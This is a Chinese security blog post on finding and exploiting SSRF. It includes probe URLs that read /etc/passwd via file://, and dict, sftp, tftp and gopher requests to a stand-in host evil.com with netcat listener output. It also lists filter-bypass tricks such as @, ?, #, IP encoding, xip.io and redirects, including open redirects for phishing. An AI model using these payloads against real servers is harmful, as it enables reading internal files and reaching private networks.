

<!DOCTYPE html>
<html lang="en" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>SSRF漏洞利用与挖掘 - 我在开了灯的床头下，想问问自己的心啊</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="什么地方最容易出现SSRF
云服务器商。(各种网站数据...">
  <meta name="author" content="John Doe">
  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1445822_s6x2xcokxrl.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: '/images/theme/loading.gif'
      },
      donate: {
        enable: false,
        alipay: 'https://pic.izhaoo.com/alipay.jpg',
        wechat: 'https://pic.izhaoo.com/wechat.jpg'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: false
      },
      preview: {
        background: {
          default: '/images/theme/welcome-image.jpg',
          api: ''
        },
        motto: {
          default: '我在开了灯的床头下，想问问自己的心啊。',
          api: 'https://v2.jinrishici.com/one.json',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: true,
        type: 'url',
        image: 'https://pic.izhaoo.com/weapp-code.jpg',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'simple'
      },
      notification: {
        enable: false,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 5.3.0"></head>

<body class="lock-screen">
  <div class="loading"></div>
  


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconqrcode j-navbar-qrcode"></i>
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
    </div>
    <div class="center">SSRF漏洞利用与挖掘</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
      <div id="qrcode-navbar"></div>
    
  </nav>

  

<nav class="menu">
  <div class="menu-wrap">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/galleries/ " class="underline "> 摄影</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>  Powered by B1gd0g  </p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="https://ss1.bdstatic.com/70cFuXSh_Q1YnxGkpoWK1HF6hhy/it/u=3195880167,2802863214&fm=11&gp=0.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">SSRF漏洞利用与挖掘</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>February 20, 2021</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>4129</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        <h2 id="什么地方最容易出现SSRF"><a href="#什么地方最容易出现SSRF" class="headerlink" title="什么地方最容易出现SSRF"></a>什么地方最容易出现SSRF</h2><ol>
<li><p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/product/cvm?from=10680">云服务器</a>商。(各种网站数据库操作)</p>
</li>
<li><p>有远程图片加载的地方。(编辑器之类的有远程图片加载啊)</p>
</li>
<li><p>网站采集、网页抓取的地方。(很多网站会有新闻采集输入url然后一键采集)</p>
</li>
<li><p>头像的地方。(某易就喜欢远程加载头像，例如:<a target="_blank" rel="noopener" href="http://www.xxxx.com/image?url=http://www.image.com/1.jpg">http://www.xxxx.com/image?url=http://www.image.com/1.jpg</a>)</p>
</li>
<li><p>最后一个一切要你输入网址的地方和可以输入ip的都放，都是ssrf的天下。</p>
</li>
<li><p>可能出现的地方：</p>
</li>
<li><p>社交分享功能；</p>
</li>
<li><p>转码服务；</p>
</li>
<li><p>图片加载与下载</p>
<p>一些的url中的关键字：share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain……</p>
</li>
</ol>
<p>从远程服务器请求资源（upload from url 如dqiscuz！；import &amp; expost rss feed 如web blog；使用了xml引擎对象的地方 如wordpress xmlrpc.php）</p>
<h2 id="SSRF神器Curl的使用"><a href="#SSRF神器Curl的使用" class="headerlink" title="SSRF神器Curl的使用"></a>SSRF神器Curl的使用</h2><h5 id="测试URL-Schema"><a href="#测试URL-Schema" class="headerlink" title="测试URL Schema"></a>测试URL Schema</h5><p>当我们发现SSRF漏洞后，首先要做的事情就是测试所有可用的URL Schema：</p>
<h6 id="file-协议："><a href="#file-协议：" class="headerlink" title="file://协议："></a>file://协议：</h6><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">这种URL Schema可以尝试从文件系统中获取文件：<br>http:<span class="hljs-regexp">//</span>example.com<span class="hljs-regexp">/ssrf.php?url=file:/</span><span class="hljs-regexp">//</span>etc/passwd<br>http:<span class="hljs-regexp">//</span>example.com<span class="hljs-regexp">/ssrf.php?url=file:/</span><span class="hljs-regexp">//</span>C:<span class="hljs-regexp">/Windows/</span>win.ini<br></code></pre></td></tr></table></figure>
<h6 id="dict-协议："><a href="#dict-协议：" class="headerlink" title="dict://协议："></a>dict://协议：</h6><p> 这种URL Scheme能够引用允许通过DICT协议使用的定义或单词列表：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span>example.com<span class="hljs-regexp">/ssrf.php?dict:/</span><span class="hljs-regexp">/evil.com:1337/</span> <br>evil.com:$ nc -lvp <span class="hljs-number">1337</span><br>Connection from [<span class="hljs-number">192.168</span>.<span class="hljs-number">0.12</span>] port <span class="hljs-number">1337</span>[tcp/*] <br>accepted (family <span class="hljs-number">2</span>, sport <span class="hljs-number">31126</span>)CLIENT libcurl <span class="hljs-number">7.40</span>.<span class="hljs-number">0</span><br></code></pre></td></tr></table></figure>
<h6 id="sftp-协议："><a href="#sftp-协议：" class="headerlink" title="sftp://协议："></a>sftp://协议：</h6><p> 在这里，Sftp代表SSH文件传输协议（SSH File Transfer Protocol），或安全文件传输协议（Secure File Transfer Protocol），这是一种与SSH打包在一起的单独协议，它运行在安全连接上，并以类似的方式进行工作。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span>example.com<span class="hljs-regexp">/ssrf.php?url=sftp:/</span><span class="hljs-regexp">/evil.com:1337/</span> <br>evil.com:$ nc -lvp <span class="hljs-number">1337</span><br>Connection from [<span class="hljs-number">192.168</span>.<span class="hljs-number">0.12</span>] port <span class="hljs-number">1337</span>[tcp/*] <br>accepted (family <span class="hljs-number">2</span>, sport <span class="hljs-number">37146</span>)SSH-<span class="hljs-number">2.0</span>-libssh2_1.<span class="hljs-number">4.2</span><br></code></pre></td></tr></table></figure>
<h6 id="ldap-协议："><a href="#ldap-协议：" class="headerlink" title="ldap://协议："></a>ldap://协议：</h6><p> LDAP代表轻量级目录访问协议。它是IP网络上的一种用于管理和访问分布式目录信息服务的应用程序协议。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span>example.com<span class="hljs-regexp">/ssrf.php?url=ldap:/</span><span class="hljs-regexp">/localhost:1337/</span>%<span class="hljs-number">0</span>astats%<span class="hljs-number">0</span>aquit<br>http:<span class="hljs-regexp">//</span>example.com<span class="hljs-regexp">/ssrf.php?url=ldaps:/</span><span class="hljs-regexp">/localhost:1337/</span>%<span class="hljs-number">0</span>astats%<span class="hljs-number">0</span>aquithttp:<span class="hljs-regexp">//</span>example.com<span class="hljs-regexp">/ssrf.php?url=ldapi:/</span><span class="hljs-regexp">/localhost:1337/</span>%<span class="hljs-number">0</span>astats%<span class="hljs-number">0</span>aquit<br></code></pre></td></tr></table></figure>
<h6 id="tftp-协议："><a href="#tftp-协议：" class="headerlink" title="tftp://协议："></a>tftp://协议：</h6><p> TFTP（Trivial File Transfer Protocol,简单文件传输协议）是一种简单的基于lockstep机制的文件传输协议，它允许客户端从远程主机获取文件或将文件上传至远程主机。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span>example.com<span class="hljs-regexp">/ssrf.php?url=tftp:/</span><span class="hljs-regexp">/evil.com:1337/</span>TESTUDPPACKET <br>evil.com:<span class="hljs-comment"># nc -lvup 1337</span><br>Listening on [<span class="hljs-number">0.0</span>.<span class="hljs-number">0.0</span>] (family <span class="hljs-number">0</span>, port1337)TESTUDPPACKEToctettsize0blksize512timeout3<br></code></pre></td></tr></table></figure>
<h6 id="gopher-协议："><a href="#gopher-协议：" class="headerlink" title="gopher://协议："></a>gopher://协议：</h6><p><a target="_blank" rel="noopener" href="https://blog.chaitin.cn/gopher-attack-surfaces/">Gopher</a>是一种分布式文档传递服务。利用该服务，用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">http:<span class="hljs-comment">//example.com/ssrf.php?url=http://attacker.com/gopher.php gopher.php (host it on acttacker.com):-<span class="hljs-meta">&lt;?php</span>  header(&#x27;Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest&#x27;);<span class="hljs-meta">?&gt;</span></span><br> evil.com:<span class="hljs-comment"># nc -lvp 1337</span><br> Listening on [<span class="hljs-number">0.0</span><span class="hljs-number">.0</span><span class="hljs-number">.0</span>] (family <span class="hljs-number">0</span>, port1337)Connection <span class="hljs-keyword">from</span> [<span class="hljs-number">192.168</span><span class="hljs-number">.0</span><span class="hljs-number">.12</span>] port <span class="hljs-number">1337</span>[tcp<span class="hljs-comment">/*] accepted (fami</span><br></code></pre></td></tr></table></figure>


<h3 id="利用ssrf打内网"><a href="#利用ssrf打内网" class="headerlink" title="利用ssrf打内网"></a>利用ssrf打内网</h3><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/-chenxs/p/11749367.html">https://www.cnblogs.com/-chenxs/p/11749367.html</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/u012206617/article/details/108941738">https://blog.csdn.net/u012206617/article/details/108941738</a></p>
<h2 id="绕过方式"><a href="#绕过方式" class="headerlink" title="绕过方式"></a>绕过方式</h2><h3 id="正则过滤指定网址"><a href="#正则过滤指定网址" class="headerlink" title="正则过滤指定网址"></a>正则过滤指定网址</h3><ul>
<li>使用http用户名密码语法，比如服务器正则判断语法，我们可以 <a target="_blank" rel="noopener" href="http://www.baidu.com/">http://abc@www.baidu.com/</a> 同样可以打开baidu</li>
<li>多级域名</li>
</ul>
<h3 id="内网IP地址绕过（不容许172、10、192开头的地址均不许输入）"><a href="#内网IP地址绕过（不容许172、10、192开头的地址均不许输入）" class="headerlink" title="内网IP地址绕过（不容许172、10、192开头的地址均不许输入）"></a>内网IP地址绕过（不容许172、10、192开头的地址均不许输入）</h3><ul>
<li>302跳转脚本，代码支持302（限制为http协议）</li>
<li>IP编码绕过，将ip转换为16进制、8进制等，一般情况都使用16进制（0x2D.11.11.11:3636）</li>
</ul>
<p>注：302跳转脚本，代码支持302（限制为http协议）</p>
<blockquote>
<h4 id="利用问号绕过限制"><a href="#利用问号绕过限制" class="headerlink" title="利用问号绕过限制"></a>利用问号绕过限制</h4><p>比如：<a target="_blank" rel="noopener" href="http://www.aaa.com/acb?Url=http://login.aaa.com">http://www.aaa.com/acb?Url=http://login.aaa.com</a> 这是一个跳转链接，跳转到它的二级域名下，那么这个问号放哪里可以绕过呢？其实就是放到它自身的域名前面也就是你添加的想要跳转的域名的后面，如：<a target="_blank" rel="noopener" href="http://www.aaa.com/acb?Url=http://test.com?login.aaa.com">http://www.aaa.com/acb?Url=http://test.com?login.aaa.com</a> 。那么，它其实是会跳转到这个test.com域名下，这个域名是我想要跳转的任意域名，而后面的它自身域名一定要带上，不带上就无法辅助用问号?这个特性来跳转到指定域名了，而跳转后，问号和问号后面的内容会变为这样：<a target="_blank" rel="noopener" href="http://www.test.com/?login.aaa.com">http://www.test.com/?login.aaa.com</a></p>
<h4 id="利用-绕过URL限制"><a href="#利用-绕过URL限制" class="headerlink" title="利用@绕过URL限制"></a>利用@绕过URL限制</h4><p>如果你用这方法在火狐里进行跳转，会有弹窗提示，在其它游览器则没有。</p>
<p>如：<a target="_blank" rel="noopener" href="http://www.aaa.com/acb?Url=http://login.aaa.com@test.com%E5%90%8E%E9%9D%A2%E7%9A%84test.com%E5%B0%B1%E6%98%AF%E8%A6%81%E8%B7%B3%E8%BD%AC%E5%88%B0%E7%9A%84%E5%9F%9F%E5%90%8D%EF%BC%8C%E5%89%8D%E9%9D%A2%E7%9A%84%E5%9F%9F%E5%90%8D%E9%83%BD%E6%98%AF%E7%94%A8%E6%9D%A5%E8%BE%85%E5%8A%A9%E4%BB%A5%E7%BB%95%E8%BF%87%E9%99%90%E5%88%B6%E7%9A%84">http://www.aaa.com/acb?Url=http://login.aaa.com@test.com后面的test.com就是要跳转到的域名，前面的域名都是用来辅助以绕过限制的</a></p>
<h4 id="利用-号绕过"><a href="#利用-号绕过" class="headerlink" title="利用#号绕过"></a>利用#号绕过</h4><p>如：<a target="_blank" rel="noopener" href="http://www.aaa.com/acb?Url=http://test.com#login.aaa.com">http://www.aaa.com/acb?Url=http://test.com#login.aaa.com</a></p>
<h4 id="利用白名单缺陷绕过限制"><a href="#利用白名单缺陷绕过限制" class="headerlink" title="利用白名单缺陷绕过限制"></a>利用白名单缺陷绕过限制</h4><p>有的域名白名单限制是不全的，比如如果想利用一个跳转，而这个跳转是通用，在这个公司网站很多子域名等都可以跳转，那么你买个域名也不算贵对吧，为什么这么说呢，这个问题就是白名单限制不当，比如，当跳转的域名包含这个网站下的所有域名，比如：<a target="_blank" rel="noopener" href="http://www.aaa.com/acb?Url=http://login.aaa.com%EF%BC%8C%E8%BF%99%E4%B8%AAlogin.aaa.com%E4%B9%9F%E5%8F%AF%E4%BB%A5%E6%94%B9%E6%88%90aaa.com%E5%90%8C%E6%A0%B7%E5%8F%AF%E4%BB%A5%E8%B7%B3%E8%BD%AC%E5%AF%B9%E5%90%A7%EF%BC%8C%E5%9B%A0%E4%B8%BA%E7%99%BD%E5%90%8D%E5%8D%95%E9%87%8C%E5%8F%AA%E8%A6%81%E6%9C%89%E5%8C%85%E5%90%AB%E8%BF%99%E4%B8%AA%E5%9F%9F%E5%90%8D%E5%B0%B1%E7%9B%B4%E6%8E%A5%E6%88%90%E5%8A%9F%E8%B7%B3%E8%BD%AC%E3%80%82%E9%82%A3%E4%B9%88%E5%BD%93%E6%88%91%E5%9C%A8%E8%BF%99%E4%B8%AA%E5%9F%9F%E5%90%8D%E5%89%8D%E9%9D%A2%E5%8A%A0%E4%B8%8A%E5%A6%82testaaa.com%EF%BC%8C%E7%99%BD%E5%90%8D%E5%8D%95%E9%87%8C%E4%BC%9A%E6%A3%80%E6%9F%A5%E6%98%AF%E5%90%A6%E5%8C%85%E5%90%ABaaa.com%E8%BF%99%E4%B8%AA%E5%9F%9F%E5%90%8D%EF%BC%8C%E5%8C%85%E5%90%AB%EF%BC%8C%E7%84%B6%E5%90%8E%E7%9B%B4%E6%8E%A5%E8%B7%B3%E8%BD%AC%EF%BC%8C%E8%80%8C%E5%B9%B6%E6%B2%A1%E6%9C%89%E6%A3%80%E6%9F%A5%E8%BF%99%E4%B8%AA%E5%9F%9F%E5%90%8D%E7%9A%84%E6%95%B4%E4%B8%AA%E4%BF%A1%E6%81%AF%EF%BC%8C%E7%84%B6%E5%90%8E%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8%E8%BF%99%E4%B8%AA%E9%97%AE%E9%A2%98%EF%BC%8C%E7%9B%B4%E6%8E%A5%E6%B3%A8%E5%86%8C%E4%B8%80%E4%B8%AAtestaaa.com%E8%BF%99%E4%B8%AA%E5%9F%9F%E5%90%8D%E5%B0%B1%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8%E8%BF%99%E4%B8%AA%E8%B7%B3%E8%BD%AC%E3%80%82">http://www.aaa.com/acb?Url=http://login.aaa.com，这个login.aaa.com也可以改成aaa.com同样可以跳转对吧，因为白名单里只要有包含这个域名就直接成功跳转。那么当我在这个域名前面加上如testaaa.com，白名单里会检查是否包含aaa.com这个域名，包含，然后直接跳转，而并没有检查这个域名的整个信息，然后可以利用这个问题，直接注册一个testaaa.com这个域名就可以利用这个跳转。</a></p>
<h4 id="利用xip-io绕过"><a href="#利用xip-io绕过" class="headerlink" title="利用xip.io绕过"></a>利用xip.io绕过</h4><p>请求是<a target="_blank" rel="noopener" href="http://www.127.0.0.1.xip.io/">http://www.127.0.0.1.xip.io</a> 这个绕过是在SSRF场景中的绕过，比如SSRF你要读取内网地址，一般都做了限制，可以尝试用这方法进行绕过限制，从而访问到内网。</p>
<p>另外一点，URL跳转涉及的安全问题大家常见的就是钓鱼，那么利用这个思路也可达成一个钓鱼问题，如，<a target="_blank" rel="noopener" href="http://www.qq.com.220.181.57.217.xip.io/">http://www.qq.com.220.181.57.217.xip.io</a> 当你访问qq这个域名时，其实这个链接已经被解析到后面这个ip地址上了，那么实际访问的就是后面这个IP地址。</p>
<h4 id="点击触发达到绕过URL跳转限制"><a href="#点击触发达到绕过URL跳转限制" class="headerlink" title="点击触发达到绕过URL跳转限制"></a>点击触发达到绕过URL跳转限制</h4><p>比如很多登陆页面的地方，其URL是一个跳转的URL，如：<a target="_blank" rel="noopener" href="http://www.aaa.com/acb?Url=http://test.com%E3%80%82%E4%BD%A0%E7%9B%B4%E6%8E%A5%E4%BF%AE%E6%94%B9%E4%BA%86%E5%90%8E%E9%9D%A2%E4%B8%BA%E4%BB%BB%E6%84%8FURL%EF%BC%8C%E4%BD%86%E6%98%AF%E8%BF%98%E6%98%AF%E5%81%9C%E7%95%99%E5%9C%A8%E5%8E%9F%E5%9C%B0%EF%BC%8C%E4%BC%BC%E4%B9%8E%E6%B2%A1%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%EF%BC%8C%E4%BD%86%E6%98%AF%EF%BC%8C%E5%BD%93%E4%BD%A0%E8%BE%93%E5%85%A5%E8%B4%A6%E5%8F%B7%E5%92%8C%E5%AF%86%E7%A0%81%E5%90%8E%E7%82%B9%E5%87%BB%E7%99%BB%E9%99%86%E6%8C%89%E9%92%AE%E5%90%8E%EF%BC%8C%E5%B0%B1%E4%BC%9A%E8%A7%A6%E5%8F%91%E8%B7%B3%E8%BD%AC%EF%BC%8C%E5%BD%93%E7%84%B6%EF%BC%8C%E8%BF%99%E4%B8%AA%E8%B4%A6%E6%88%B7%E5%92%8C%E5%AF%86%E7%A0%81%E4%B8%8D%E4%B8%80%E5%AE%9A%E8%A6%81%E5%AF%B9%E7%9A%84%EF%BC%8C%E9%9A%8F%E4%BE%BF%E9%83%BD%E5%8F%AF%E4%BB%A5%EF%BC%8C%E4%BD%86%E5%BE%97%E8%A7%86%E7%B3%BB%E7%BB%9F%E8%80%8C%E5%AE%9A%E5%90%A7%E3%80%82%E8%BF%99%E4%B8%AA%E6%88%91%E9%81%87%E5%88%B0%E4%BA%86%E5%BE%88%E5%A4%9A%EF%BC%8C%E6%AF%94%E5%A6%82%E4%BD%A0%E4%BF%AE%E6%94%B9%E4%BA%86%E5%9F%9F%E5%90%8D%EF%BC%8C%E7%84%B6%E5%90%8E%E7%82%B9%E5%87%BB%E7%99%BB%E9%99%86%EF%BC%8C%E7%99%BB%E9%99%86%E6%88%90%E5%8A%9F%E5%90%8E%E4%BE%BF%E5%8F%AF%E8%A7%A6%E5%8F%91%E8%B7%B3%E8%BD%AC%EF%BC%8C%E8%BF%99%E4%B9%9F%E6%98%AF%E4%B8%80%E4%B8%AA%E6%AF%94%E8%BE%83%E9%9A%90%E8%94%BD%E7%9A%84%E7%BB%95%E8%BF%87URL%E9%99%90%E5%88%B6%E7%9A%84%E8%B7%B3%E8%BD%AC%E3%80%82">http://www.aaa.com/acb?Url=http://test.com。你直接修改了后面为任意URL，但是还是停留在原地，似乎没什么问题，但是，当你输入账号和密码后点击登陆按钮后，就会触发跳转，当然，这个账户和密码不一定要对的，随便都可以，但得视系统而定吧。这个我遇到了很多，比如你修改了域名，然后点击登陆，登陆成功后便可触发跳转，这也是一个比较隐蔽的绕过URL限制的跳转。</a></p>
<h4 id="多重验证-amp-跳转绕过限制"><a href="#多重验证-amp-跳转绕过限制" class="headerlink" title="多重验证&amp;跳转绕过限制"></a>多重验证&amp;跳转绕过限制</h4><p>现在很多网站都有多重验证，比如你登陆账户后会出现另一个验证页面，输入手机验证码进行验证，此时这上面的URL很可能存在任意跳转的问题。</p>
<h4 id="多重跳转的问题导致可绕过URL限制"><a href="#多重跳转的问题导致可绕过URL限制" class="headerlink" title="多重跳转的问题导致可绕过URL限制"></a>多重跳转的问题导致可绕过URL限制</h4><p>比如<a target="_blank" rel="noopener" href="http://www.aaa.com/acb?Url=http://login.aaa.com/acb?url=http://login.aaa.com%E3%80%82%E5%BD%93%E7%84%B6%EF%BC%8C%E8%BF%98%E6%9C%89%E5%A4%9A%E9%87%8D%E7%9A%84%EF%BC%8C%E8%BF%99%E4%B8%AA%E7%BB%93%E6%9E%84%E7%9A%84%E5%A4%9A%E9%87%8D%E8%B7%B3%E8%BD%AC%E4%BD%A0%E4%BF%AE%E6%94%B9%E6%9C%80%E5%90%8E%E9%9D%A2%E7%9A%84URL%E5%B0%B1%E5%8F%AF%E4%BB%A5%E8%BE%BE%E5%88%B0%E4%BB%BB%E6%84%8FURL%E8%B7%B3%E8%BD%AC%EF%BC%8C%E4%B8%AD%E9%97%B4%E7%9A%84URL%E5%B0%B1%E6%B2%A1%E5%BF%85%E8%A6%81%E5%8A%A8%E4%BA%86%E3%80%82">http://www.aaa.com/acb?Url=http://login.aaa.com/acb?url=http://login.aaa.com。当然，还有多重的，这个结构的多重跳转你修改最后面的URL就可以达到任意URL跳转，中间的URL就没必要动了。</a></p>
</blockquote>

      </section>
      <section class="extra">
        
        
        
        
  <nav class="nav">
    <a></a>
    <a href="/2021/02/20/%E5%88%A9%E7%94%A8python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96bypass360/">利用python反序列化bypass360<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
        <section class="comments">
  
    <div class="btn" id="comments-btn">查看评论</div>
  
  
</section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E5%9C%B0%E6%96%B9%E6%9C%80%E5%AE%B9%E6%98%93%E5%87%BA%E7%8E%B0SSRF"><span class="toc-text">什么地方最容易出现SSRF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF%E7%A5%9E%E5%99%A8Curl%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-text">SSRF神器Curl的使用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8ssrf%E6%89%93%E5%86%85%E7%BD%91"><span class="toc-text">利用ssrf打内网</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F"><span class="toc-text">绕过方式</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A3%E5%88%99%E8%BF%87%E6%BB%A4%E6%8C%87%E5%AE%9A%E7%BD%91%E5%9D%80"><span class="toc-text">正则过滤指定网址</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%85%E7%BD%91IP%E5%9C%B0%E5%9D%80%E7%BB%95%E8%BF%87%EF%BC%88%E4%B8%8D%E5%AE%B9%E8%AE%B8172%E3%80%8110%E3%80%81192%E5%BC%80%E5%A4%B4%E7%9A%84%E5%9C%B0%E5%9D%80%E5%9D%87%E4%B8%8D%E8%AE%B8%E8%BE%93%E5%85%A5%EF%BC%89"><span class="toc-text">内网IP地址绕过（不容许172、10、192开头的地址均不许输入）</span></a></li></ol></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="xxx "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="UW5rdFFqRm5aREJu "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#09BB07'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconwechat-fill "></i>
      </a><a 
        href="https://github.com/B1gd0g "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
        href="UWpGblpEQm5RSEJ5YjNSdmJtMWhhV3d1WTI5dA== "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>  Powered by B1gd0g  </p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
    <div class="scrollbar j-scrollbar">
  <div class="scrollbar-current j-scrollbar-current"></div>
</div>
  
  
    
<script src="/js/color-mode.js"></script>

  
</body>

<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>



  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>






  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>




<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>







  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>













</html>